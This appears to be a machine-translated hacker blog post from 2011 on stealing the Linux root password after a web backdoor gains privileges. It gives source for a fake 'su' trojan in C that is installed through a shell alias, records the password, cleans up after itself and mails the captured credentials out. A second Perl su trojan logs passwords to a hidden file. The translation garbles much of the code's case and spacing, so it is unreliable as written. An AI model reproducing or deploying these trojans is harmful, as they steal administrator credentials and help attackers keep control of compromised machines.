Get the Linux root password after right

get the Linux root password after right

2011-09-09 10:45:25      I say two sentences       

favorites       I want to contribute

After the Webbackdoor itself is root (a little less likely) or is successfully given the highest privilege through a vulnerability overflow, it can bring us a lot of benefits if we can get the root password. Query the method of predecessors, one is to cheat SU record password, the other is to replace sshd, we first look at the code to cheat SU record password!

Look first, kpr-fakesu.c v0.9beta167 fucksu.c

/* * KPR-FAKESU.C v0.9beta167; P * by Koper <[email protected]> * * Setting up: *[email protected]:~$Gcc-o. Su fakesu.c; RM-RF FAKESU.C *[email protected]:~$mv. su/var/tmp/.su *[email protected]:~$CP. Bash_profile. WGETRC * [email protected]:~$echo "Alias su=/var/tmp/.su" >>.bash_profile *[email protected]:~$LOGOUT * * * * LOGIN * *[email protected]:~$ su * Password: * su:authentication failure * Sorry. * [email  Protected] : ~$ su * Password: *  [ Email protected] : ~# logout * [email protected] : ~$  cat/var/tmp/.pwds * root:dupcia17 * [email protected] : ~$ * */BIN/SU sends various failure information Depending on the OS ver. * Modify the source to make it "fit" * */

#include <stdio.h> #include <stdlib.h>

Main (int argc, char *argv[]) {

FILE *FP; Char *user; Char *pass; Char filex[100]; Char clean[100];

sprintf (Filex, "/var/tmp/.pwds"); sprintf (Clean, "rm-rf/var/tmp/.su;mv-f/home/admin/.wgetrc/home/admin/.bash_profile"); if (argc==1) user= "root"; if (argc==2) user=argv[1]; if (argc>2) {if (strcmp (argv[1], "-l") ==0) user=argv[2]; else user=argv[1];}

fprintf (stdout, "Password:"); Pass=getpass (""); System ("Sleep 3″"); fprintf (stdout, "su:authentication FAILURENSORRY.N");

if (Fp=fopen (Filex, "w")) = NULL) {fprintf (FP, "%S:%SN", user, pass); fclose (FP);}

System (Clean); System ("RM-RF/VAR/TMP/.SU; Ln-s/bin/su/var/tmp/.su ");

/* If you don ' t want password in your e-mail uncomment this line: */

System ("Uname-a >>/var/tmp/.pwds; Cat/var/tmp/.pwds | Mail[email protected]");

}

Perl version

Perl version: #!/usr/bin/perl

#################################################################################################### #[email protected] 2006 Su Trojan check so the SU path is correct.                                   # then make alias for Trojan first it reads the pass then exec the real SU.&NBSP;&NBSP;&NBSP;&NBSP;&N bsp;                  # # Logging to/tmp/.pass                                                                             # #################################################################################################### print "Password:"; $s 1=<stdin>; print "SORRY.N"; $s 2= "Password is:"; $s 3= ' date +%y-%m-%d '; Open (Users, ">>/tmp/.pass") | | Die (' Could not open file '. $! "); Print users ($s 2, $s 1, $s 3); Close (users);

System ("/bin/su")